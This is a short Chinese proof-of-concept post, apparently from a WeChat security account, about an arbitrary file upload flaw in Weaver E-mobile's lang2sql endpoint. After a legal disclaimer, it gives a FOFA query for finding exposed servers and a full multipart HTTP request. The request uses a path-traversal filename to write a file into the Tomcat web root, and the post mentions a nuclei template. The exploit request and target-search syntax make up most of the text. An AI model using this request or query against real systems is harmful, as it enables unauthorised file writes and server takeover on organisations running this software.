
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!
漏洞概述

泛微 E-mobile系统 lang2sql接口存在任意文件上传漏洞。
空间搜索语法

fofa
title="移动管理平台-企业管理"

利用过程

登录界面
POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Content-Length: 204
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/vyrnmpek.txt"
frobowmh
------WebKitFormBoundarymVk33liI64J7GQaK--
漏洞存在响应包如下。
nuclei

✓
关注我们
原文始发于微信公众号(天澜实验室):泛微 E-mobile lang2sql 任意文件上传